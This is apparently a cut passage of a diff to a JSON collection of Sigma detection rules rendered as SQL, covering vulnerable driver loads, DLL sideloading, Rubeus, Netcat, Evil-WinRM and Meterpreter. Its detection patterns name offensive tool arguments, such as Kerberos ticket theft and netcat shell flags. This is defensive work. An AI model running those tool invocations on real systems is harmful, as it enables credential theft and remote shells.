'8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026', '52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9', '32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', 'ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec', '771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', 'e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220', '1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b', '029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df', '1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557', 'c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522', 'a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512', '5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e', 'e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4', 
'7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230', '97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56', '8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f', '09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184', '2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d', '5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683', 'f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54', '2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b', '1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e', '84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42', '0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c', 'a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b', '4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219', '6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a', 'c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747', 'd3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34', '3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%~1.exe%' ESCAPE '\\' OR CommandLine LIKE '%~1.bat%' ESCAPE '\\' OR CommandLine LIKE '%~1.msi%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~1.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~1.dll%' ESCAPE '\\' OR CommandLine LIKE '%~1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~1.js%' ESCAPE '\\' OR CommandLine LIKE '%~1.hta%' ESCAPE '\\' OR CommandLine LIKE '%~2.exe%' ESCAPE '\\' OR CommandLine LIKE '%~2.bat%' ESCAPE '\\' OR CommandLine LIKE '%~2.msi%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbe%' ESCAPE '\\' OR CommandLine LIKE '%~2.vbs%' ESCAPE '\\' OR CommandLine LIKE '%~2.dll%' ESCAPE '\\' OR CommandLine LIKE '%~2.ps1%' ESCAPE '\\' OR CommandLine LIKE '%~2.js%' ESCAPE '\\' OR CommandLine LIKE '%~2.hta%' ESCAPE 
'\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\') OR CommandLine LIKE '%C:\\\\xampp\\\\vcredist\\\\VCREDI~1.EXE%' ESCAPE '\\'))" ], - "filename": "driver_load_win_vuln_drivers.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_cli.yml" }, { - "title": "Vulnerable WinRing0 Driver Load", - "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", - "status": "experimental", - "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - WinRM Access Via Evil-WinRM", + "id": "a197e378-d31b-41c0-9635-cfdf1c1bb423", + "status": "test", + "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' AND CommandLine LIKE '%-i %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\')" ], - "filename": "driver_load_win_vuln_winring0_driver.yml" + "filename": "proc_creation_win_hktl_evil_winrm.yml" }, { - "title": "Usage 
Of Malicious POORTRY Signed Driver", - "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "title": "Suspicious Reg Add BitLocker", + "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", "status": "experimental", - "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1543", - "attack.t1068" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate BIOS driver updates (should be rare)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE '%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR 
CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" ], - "filename": "driver_load_win_mal_poortry_driver.yml" + "filename": "proc_creation_win_reg_bitlocker.yml" }, { - "title": "Vulnerable GIGABYTE Driver Load", - "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", + "title": "Add Potential Suspicious New Download Source To Winget", + "id": "c15a46a0-07d4-4c87-b4b6-89207835a83b", "status": "experimental", - "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new potentially suspicious download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%MD5=9AB9F3B75A2EB87FAFB1B7361BE9DFB3%' ESCAPE '\\' OR Hashes LIKE '%MD5=C832A4313FF082258240B61B88EFA025%' ESCAPE '\\' OR Hashes LIKE '%SHA1=FE10018AF723986DB50701C8532DF5ED98B17C39%' ESCAPE '\\' OR Hashes LIKE '%SHA1=1F1CE28C10453ACBC9D3844B4604C59C0AB0AD46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=31F4CFB4C71DA44120752721103A16512444C13C2AC2D857A7E6F13CB679B427%' ESCAPE '\\' OR Hashes LIKE '%SHA256=CFC5C585DD4E592DD1A08887DED28B92D9A5820587B6F4F8FA4F56D60289259B%' ESCAPE '\\') OR md5 IN ('9ab9f3b75a2eb87fafb1b7361be9dfb3', 'c832a4313ff082258240b61b88efa025') OR sha1 IN ('fe10018af723986db50701c8532df5ed98b17c39', '1f1ce28c10453acbc9d3844b4604c59c0ab0ad46') OR sha256 IN ('31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', 'cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\') AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}')" ], - "filename": "driver_load_win_vuln_gigabyte_driver.yml" + "filename": "proc_creation_win_winget_add_susp_custom_source.yml" }, { - "title": "Suspicious Driver Load from Temp", - "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", - "status": "test", - "description": "Detects a driver load from a temporary directory", + "title": "HackTool - Rubeus Execution", + "id": "7ec2c172-dceb-4c10-92c9-87c1881b7e18", + "status": "stable", + "description": "Detects the execution of the hacktool Rubeus via PE information of command line parameters", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "There is a relevant set of false positives depending on applications in the environment" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Rubeus.exe' ESCAPE '\\' OR OriginalFileName = 'Rubeus.exe' OR Description = 'Rubeus' OR (CommandLine LIKE '%asreproast %' ESCAPE '\\' OR CommandLine LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR CommandLine LIKE '%dump /luid:0x%' ESCAPE '\\' OR CommandLine LIKE '%kerberoast %' ESCAPE '\\' OR CommandLine LIKE '%createnetonly /program:%' ESCAPE '\\' OR CommandLine LIKE '%ptt /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%/impersonateuser:%' ESCAPE '\\' OR CommandLine LIKE '%renew /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%asktgt /user:%' ESCAPE '\\' OR 
CommandLine LIKE '%harvest /interval:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /user:%' ESCAPE '\\' OR CommandLine LIKE '%s4u /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%hash /password:%' ESCAPE '\\' OR CommandLine LIKE '%golden /aes256:%' ESCAPE '\\' OR CommandLine LIKE '%silver /user:%' ESCAPE '\\')))" ], - "filename": "driver_load_win_susp_temp_use.yml" + "filename": "proc_creation_win_hktl_rubeus.yml" }, { - "title": "Vulnerable HW Driver Load", - "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "title": "PUA - Netcat Suspicious Execution", + "id": "e31033fc-33f0-4020-9a16-faf9b31cbf08", "status": "experimental", - "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1543.003" + "attack.command_and_control", + "attack.t1095" ], "falsepositives": [ - "Unknown" + "Legitimate ncat use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' 
ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ncat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netcat.exe' ESCAPE '\\') OR (CommandLine LIKE '% -lvp %' ESCAPE '\\' OR CommandLine LIKE '% -lvnp%' ESCAPE '\\' OR CommandLine LIKE '% -l -v -p %' ESCAPE '\\' OR CommandLine LIKE '% -lv -p %' ESCAPE '\\' OR CommandLine LIKE '% -l --proxy-type http %' ESCAPE '\\' OR CommandLine LIKE '% -vnl --exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" ], - "filename": "driver_load_win_vuln_hw_driver.yml" + "filename": "proc_creation_win_pua_netcat.yml" }, { - "title": "DLL Sideloading Of DBGHELP.DLL", - "id": "6414b5cd-b19d-447e-bb5e-9f03940b5784", + "title": "Potential Suspicious Activity Using SeCEdit", + "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", "status": "experimental", - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects potential suspicious behaviour using secedit.exe. 
Such as exporting or modifying the security policy", + "author": "Janantha Marasinghe", "tags": [ - "attack.defense_evasion", + "attack.discovery", "attack.persistence", + "attack.defense_evasion", + "attack.credential_access", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.002", + "attack.t1547.001", + "attack.t1505.005", + "attack.t1556.002", + "attack.t1562", + "attack.t1574.007", + "attack.t1564.002", + "attack.t1546.008", + "attack.t1546.007", + "attack.t1547.014", + "attack.t1547.010", + "attack.t1547.002", + "attack.t1557", + "attack.t1082" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') OR (ImageLoaded LIKE '%\\\\Epic Games\\\\Launcher\\\\Engine\\\\Binaries\\\\ThirdParty\\\\DbgHelp\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Epic Games\\\\MagicLegends\\\\x86\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\amd64\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Anaconda3\\\\Lib\\\\site-packages\\\\vtrace\\\\platforms\\\\windll\\\\i386\\\\dbghelp.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine 
LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbghelp_dll.yml" + "filename": "proc_creation_win_secedit_execution.yml" }, { - "title": "Potential System DLL Sideloading From Non System Locations", - "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "status": "experimental", - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Meterpreter/CobaltStrike Activity", + "id": "15619216-e993-4721-b590-4c520615a67d", + "status": "test", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + "Commandlines containing components like cmd accidentally", + "Jobs and services started with cmd" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' 